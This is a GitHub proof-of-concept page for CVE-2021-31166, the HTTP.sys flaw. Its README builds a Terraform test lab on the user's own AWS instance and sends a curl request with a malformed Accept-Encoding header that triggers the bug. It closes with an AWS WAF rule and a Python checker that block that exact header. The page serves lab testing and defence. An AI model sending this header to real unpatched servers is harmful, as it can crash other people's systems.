
CVE-2021-31166 PoC — Microsoft HTTP.sys resource management error vulnerability

Associated Vulnerability
Title: Microsoft HTTP.sys resource management error vulnerability (CVE-2021-31166)
Description: Microsoft HTTP.sys is an application protocol component (the HTTP application protocol) from the US company Microsoft. HTTP.sys has a resource management error vulnerability. The following products and versions are affected: Windows 10 Version 2004 for 32-bit Systems, Windows 10 Version 2004 for ARM64-based Systems, Windows 10 Version 2004 for x64-based Systems, Windows Server, version 2004 (Ser
Readme
# WIn-CVE-2021-31166

**This Repo** is inspired by [0vercl0k](https://github.com/0vercl0k/CVE-2021-31166#cve-2021-31166-http-protocol-stack-remote-code-execution-vulnerability)'s proof of concept for [CVE-2021-31166](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166) ("HTTP Protocol Stack Remote Code Execution Vulnerability"), a use-after-free dereference in `http.sys` patched by Microsoft in May 2021.

## Build Infrastructure

```bash
git clone https://github.com/bgsilvait/WIn-CVE-2021-31166.git
cd WIn-CVE-2021-31166
terraform init
terraform plan
terraform apply --auto-approve
```

Terraform creates an EC2 instance running [Windows Server Core 20H2](https://docs.microsoft.com/en-us/windows-server/get-started/whats-new-in-windows-server-2004), installs `IIS`, and attaches `SSM` permissions so that a `Web PowerShell Session` can be opened from the AWS Console. It also creates an `Application Load Balancer` with the instance as its target. By default the `Security Group` allows only **YOUR IP** to reach the instance over **HTTP**.

## Get values

```bash
# Define values from the Terraform output
ALB=$(terraform output -raw lb_dns_name)
EC2IP=$(terraform output -json public_ip | jq -r '.[0]')
```

## Testing Connectivity

```bash
# Test through the ALB
while true; do curl -I "$ALB" --connect-timeout 1 ; done

# Test directly against the EC2 instance
while true; do curl -I "$EC2IP" --connect-timeout 1 ; done
```

## Inject CVE Header

```bash
# Test through the ALB
curl -i "$ALB" -H "Accept-Encoding: doar-e, ftw, imo, ,"

# Test directly against the EC2 instance
curl -i "$EC2IP" -H "Accept-Encoding: doar-e, ftw, imo, ,"
```

## Rule for AWS WAFv2 to Block

This rule matches the `accept-encoding` header only when its value is exactly the PoC string used above, so it demonstrates blocking the test request in front of the ALB; it does not replace the May 2021 patch on the instance itself.

```json
{
  "Name": "cve-block",
  "Priority": 0,
  "Statement": {
    "ByteMatchStatement": {
      "SearchString": "doar-e, ftw, imo, ,",
      "FieldToMatch": {
        "SingleHeader": {
          "Name": "accept-encoding"
        }
      },
      "TextTransformations": [
        {
          "Priority": 0,
          "Type": "NONE"
        }
      ],
      "PositionalConstraint": "EXACTLY"
    }
  },
  "Action": {
    "Block": {
      "CustomResponse": {
        "ResponseCode": 418,
        "CustomResponseBodyKey": "418"
      }
    }
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "cve-block"
  }
}
```
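To check what the rule above matches before deploying it, here is an added example (not from the repo) that models the AWS WAF `ByteMatchStatement` semantics in Python and runs the rule over constructed sample requests. It is a simplified model: header-name lookup is case-insensitive, only the `NONE` and `LOWERCASE` text transformations and the `EXACTLY`, `CONTAINS`, `STARTS_WITH` and `ENDS_WITH` constraints are implemented, and the sample headers are constructed, not captured traffic.

```python
from typing import Dict, Optional

# The README's WAF rule, reduced to the fields the evaluator needs.
WAF_RULE = {
    "Name": "cve-block",
    "Statement": {"ByteMatchStatement": {
        "SearchString": "doar-e, ftw, imo, ,",
        "FieldToMatch": {"SingleHeader": {"Name": "accept-encoding"}},
        "TextTransformations": [{"Priority": 0, "Type": "NONE"}],
        "PositionalConstraint": "EXACTLY",
    }},
    "Action": {"Block": {"CustomResponse": {"ResponseCode": 418, "CustomResponseBodyKey": "418"}}},
}

# Constructed sample requests (header dicts), not captured traffic.
SAMPLE_REQUESTS = {
    "poc": {"Accept-Encoding": "doar-e, ftw, imo, ,"},
    "poc-uppercase-name": {"ACCEPT-ENCODING": "doar-e, ftw, imo, ,"},
    "browser": {"Accept-Encoding": "gzip, deflate, br"},
    "no-header": {"Host": "example.test"},
}

def byte_match(stmt: dict, headers: Dict[str, str]) -> bool:
    """Evaluate a ByteMatchStatement on a SingleHeader field (simplified model)."""
    wanted = stmt["FieldToMatch"]["SingleHeader"]["Name"].lower()
    value = next((v for k, v in headers.items() if k.lower() == wanted), None)
    if value is None:
        return False  # field absent: a match statement never fires
    for t in sorted(stmt["TextTransformations"], key=lambda t: t["Priority"]):
        if t["Type"] == "LOWERCASE":
            value = value.lower()
        elif t["Type"] != "NONE":
            raise ValueError(f"transformation {t['Type']} not modelled here")
    needle, constraint = stmt["SearchString"], stmt["PositionalConstraint"]
    checks = {
        "EXACTLY": value == needle,
        "CONTAINS": needle in value,
        "STARTS_WITH": value.startswith(needle),
        "ENDS_WITH": value.endswith(needle),
    }
    return checks[constraint]

def evaluate(rule: dict, headers: Dict[str, str]) -> Optional[int]:
    """Return the custom block status code the rule would send, or None if the request passes."""
    if byte_match(rule["Statement"]["ByteMatchStatement"], headers):
        return rule["Action"]["Block"]["CustomResponse"]["ResponseCode"]
    return None

def evaluate_all(rule: dict = WAF_RULE) -> Dict[str, Optional[int]]:
    return {name: evaluate(rule, hdrs) for name, hdrs in SAMPLE_REQUESTS.items()}
```

Running `evaluate_all()` shows the PoC request blocked with 418 regardless of header-name casing, while a normal browser `Accept-Encoding` and a request without the header pass through.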
File Snapshot

/data/pocs/dfeeef86377848d8f05c9f4f98fce3ac917f4d2a
├── main.tf (4.5K)
├── outputs.tf (489 bytes)
└── README.md (2.3K)
0 directories, 3 files